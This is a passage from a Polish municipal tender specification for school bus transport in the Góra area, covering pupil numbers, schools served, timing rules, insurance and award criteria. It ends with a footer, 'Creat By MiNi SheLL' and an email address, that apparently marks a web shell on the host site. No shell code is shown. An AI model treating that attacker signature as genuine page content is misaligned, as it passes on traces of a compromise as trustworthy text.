2. Prognozowana łączna liczba uczniów dojeżdżających co miesiąc do placówek oświatowych wynosi: 569, szacunkowa liczba opiekunów:11, szacunkowa liczba kilometrów w okresie realizacji umowy: 108 476,50 km. 
2.1. Faktyczna ilość kilometrów będzie uzależniona od ustalonej przez Wykonawcę trasy. Trasa powinna przebiegać możliwie najkrótszą, optymalną drogą, dostosowaną do rozkładu zajęć. Wykonawca winien uzgodnić przebieg trasy w porozumieniu z Zamawiającym, a także wskazać rzeczywiste długości tras/odcinków w km. 
3. Przedmiot zamówienia obejmuje dowóz uczniów wraz z opiekunami do niżej wskazanych placówek oświatowych, a także odwóz do miejsca zamieszkania po zakończeniu zajęć:
a) Szkoła Podstawowa nr 1 im. Bolesława Prusa w Górze - ul. M. Konopnickiej 2, ul. Piastów nr 34;
b) Szkoła Podstawowa nr 3 im. Władysława Broniewskiego w Górze - ul. Poznańska 2, ul. Podwale 20;
c) Gimnazjum nr 1 im. Marii Skłodowskiej - Curie w Górze -ul. Szkolna 2;
d) Gimnazjum nr 2 im. Mikołaja Kopernika w Górze - ul. Poznańska 2a;
e) Przedszkole Publiczne nr 1 w Górze im. Marii Konopnickiej, ul. Żeromskiego 15;
f) Przedszkole Publiczne nr 3 w Górze im. Jasia i Małgosi - ul. Piastów 7, oddział Stara Góra 15; 
g) Zespół Szkoła Podstawowa i Przedszkole im. Władysława Reymonta w Witoszycach - Witoszyce 10;
h) Zespół Szkolno - Przedszkolny z Oddziałami Integracyjnymi im. 55 Poznańskiego Pułku Piechoty 
    w Glince, - Glinka 6;
i) Zespół Szkoła Podstawowa, Gimnazjum i Przedszkole im. św. Huberta w Czerninie - ul. Szkolna 2;
j) Zespół Szkoła Podstawowa i Przedszkole im. Janusza Korczaka w Ślubowie- Ślubów 25 i 54;
k) Specjalny Ośrodek Szkolno-Wychowawczy w Wąsoszu (dzieci niepełnosprawne)- ul. Korczaka 6
 (dowóz do SOSW w Wąsoszu dzieci posiadających orzeczenie o niepełnosprawności).
3.1. Szczegółowe informacje zawarto załącznikach:
1A -  wykaz ilościowy dzieci wg poszczególnych miejscowości i placówek oświatowych, 
       1B - przykładowy rozkład dowozu i odwozu, 
       1C - godziny rozpoczęcia i zakończenia zajęć w placówkach oświatowych,
       1D - wykaz uczniów wg miejscowości,
       1E - szacunkowa łączna liczba kilometrów.
4.Usługa obejmuje dowóz dzieci  z terenu gminy Góra (z wyznaczonych miejsc przystankowych) wraz z opiekunami (jeden opiekun na każdy pojazd), do placówek oświatowych zlokalizowanych na obszarze gminy Góra i gminy Wąsosz* (*dowóz dzieci niepełnosprawnych do Specjalnego Ośrodka Szkolno-Wychowawczego w Wąsoszu). Zamówienie obejmuje również odwiezienie dzieci wraz z opiekunami po zakończeniu zajęć szkolnych do miejsca zamieszkania (do wyznaczonych miejsc przystankowych). 
5.Zamawiający, we własnym zakresie zapewni dla przewożonych dzieci jednego opiekuna na każdy pojazd Wykonawcy. Szacunkowa liczba opiekunów: 11 osób.
6.Wykonawca zobligowany jest do uzyskania wszelkich niezbędnych zezwoleń dla świadczenia usług objętych przedmiotem zamówienia.
7.Ilość dzieci może ulegać w okresach miesięcznych zwiększeniu bądź zmniejszeniu ze względu na migrację ludności. W przypadku zmiany ilości dzieci dojeżdżających Wykonawca dostosuje trasy i liczbę kursów do potrzeb sprawnego dowozu dzieci do placówek na warunkach podanych w ofercie. Z tytułu zmniejszenia ilości dowożonych uczniów Zamawiający nie przewiduje ponoszenia dodatkowych opłat, a Wykonawca nie będzie rościł pretensji ani żądał rekompensaty finansowej, jeżeli wartość zamówienia będzie mniejsza niż szacowana przez Zamawiającego.
8.Wykonawca zobowiązany jest do ścisłego stosowania się do godzin dowozu i odwozu ustalonych w rozkładzie dowozu i odwozu i zatrzymywania się w wyznaczonych miejscach, z zastrzeżeniem że dzieci muszą być dowiezione do szkół najpóźniej na 5 minut przed rozpoczęciem zajęć lekcyjnych i nie wcześniej niż 40 minut przed rozpoczęciem zajęć lekcyjnych.
9.Zamawiający zastrzega, że okres oczekiwania dzieci na odwóz do miejsc zamieszkania (wyznaczonych miejsc przystankowych) po zakończonych zajęciach nie będzie dłuższy niż 1 godzina. 
10.Kierowca pojazdu będzie informował dzieci, na którym przystanku się aktualnie znajdują.
11.Zamawiający zastrzega sobie możliwość odstępstw od podanego rozkładu dowozów i odwozów, stanowiącego załącznik nr 1B do SIWZ i umowy, z powodu zmiany planu lekcji, ilości dzieci, likwidacji szkół, zmiany organizacji roku szkolnego, odpracowania dni wolnych, itp. W przypadku odpracowania zajęć szkolnych w innym dniu wolnym od zajęć Wykonawca zobowiązany jest zapewnić przewóz zgodnie z rozkładem jazdy ustalonym przez Zamawiającego. Zamawiający zastrzega sobie możliwość wprowadzenia na określone dni innego niż ustalony rozkład dowozów i odwozów, w szczególności przed rozpoczęciem roku szkolnego, po powiadomieniu Wykonawcy w terminie co najmniej 7 dni przed dniem, w którym nastąpi zmiana. O rezygnacji z kursu w danym dniu i trasie, Zamawiający powiadomi Wykonawcę co najmniej 1 dzień wcześniej przed takim zdarzeniem.
12.Zmiany w rozkładzie jazdy oraz ilości dzieci/młodzieży szkolnej w danym miesiącu możliwe są na podstawie pisemnego zatwierdzenia przez Zamawiającego. 
13.Wykonawca winien posiadać odpowiednią ilość sprawnych technicznie pojazdów (szczególną uwagę należy zwrócić na instalację grzewczą w okresie zimowym) zdolnych do przewiezienia dzieci i opiekunów dowożonych na danej trasie ( szacunkową ilość wskazano w zał. nr 1 A, 1B, 1 D do SIWZ). Wykonawca musi uruchomić w razie potrzeby dodatkowe kursy, aby zapewnić dzieciom bezpieczne i higieniczne  warunki w czasie dowozu. Wykonawca zobowiązuje się do utrzymania taboru w wielkości umożliwiającej prawidłowe wykonanie umowy oraz że usługi będą świadczone środkami transportu przystosowanymi do przewozu młodzieży szkolnej spełniającymi wszystkie wymagania bezpieczeństwa, higieny i kodeksu drogowego, przez osoby mające odpowiednie uprawnienia do świadczenia tych usług.                                   
14.Wykonawca zobligowany jest zapewnić wszystkim przewożonym uczniom miejsca siedzące.   
15.W razie uszkodzenia lub awarii pojazdu wykonującego przewóz, Wykonawca zobowiązuje się podstawić sprawny technicznie zastępczy pojazd w ciągu maksymalnie 90 minut. Jest to termin maksymalny. Jego skrócenie będzie premiowane w ramach kryteriów oceny ofert.
16. Wykonawca jest obowiązany posiadać aktualne badania techniczne i ubezpieczenia OC pojazdów uczestniczących w dowozach oraz zobligowany jest ubezpieczyć również przewożone w ramach umowy osoby od następstw nieszczęśliwych wypadków. Polisy ubezpieczenia Wykonawca przedkłada na wezwanie Zamawiającego.
17. Zamawiający nie bierze żadnej odpowiedzialności za wypadki i zdarzenia jakiegokolwiek typu, w wyniku których nastąpi uszkodzenie ciała, śmierć czy szkoda materialna, spowodowana działalnością Wykonawcy. Wykonawca ponosi pełną odpowiedzialność za szkody wynikające z wypadków lub innych zdarzeń wynikłych w czasie realizacji usługi stanowiącej przedmiot umowy, dlatego Wykonawca oświadcza, że posiada ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości co najmniej odpowiadającej wartości całkowitego wynagrodzenia Wykonawcy wskazanego w niniejszej umowie. Wykonawca gwarantuje bezpieczeństwo osób i mienia podczas wykonywania usług przewozu osób. 
18.Wykonawca na wezwanie Zamawiającego przedkłada dokumenty potwierdzające posiadanie ubezpieczenia odpowiedzialności OC w zakresie prowadzonej działalności. 
19.Wykonawca nie bierze żadnej odpowiedzialności za dzieci/młodzież, które nie stawią się w oznaczonej godzinie w miejscu przystanku lub postoju pojazdu.
20. Wykonawca zapozna się ze stanem dróg, na których realizowane będą przewozy. Trasa powinna przebiegać możliwie najkrótszą drogą.
21. Wykonawca zobowiązany jest do przestrzegania zakazu palenia w pojeździe.
22. Wykonanie przedmiotu umowy winno być zgodne z przepisami prawa, w szczególności z:
a) ustawą z dnia 15 listopada 1984 r. Prawo przewozowe (t.j. Dz. U. z 2015 r., poz. 915), 
b) ustawą z dnia 6 września 2001 r. o transporcie drogowym (t.j. Dz. U. z 2013 r., poz. 1414 z późn. zm.), 
c) ustawą z dnia 20 czerwca 1997r. Prawo o ruchu drogowym (t.j. Dz. U. z 2012 r., poz. 1137 z późn. zm.),
23.Zaleca się wykonawcom bardzo dokładne zapoznanie się z warunkami wykonywania przedmiotu zamówienia w celu prawidłowego oszacowania przez Wykonawcę kosztów i ryzyka usługi, oraz uzyskania i zweryfikowania wszelkich danych jakie mogą być niezbędne w przygotowaniu oferty 
i podpisaniu umowy na wykonanie przedmiotu zamówienia.
24.Świadczona usługa będzie wykonywana zgodnie z warunkami przedmiotowej Specyfikacji Istotnych Warunków Zamówienia oraz umową stanowiącą załącznik do niniejszej SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9, 60.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Czas podstawienia pojazdu zamiennego - 3</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com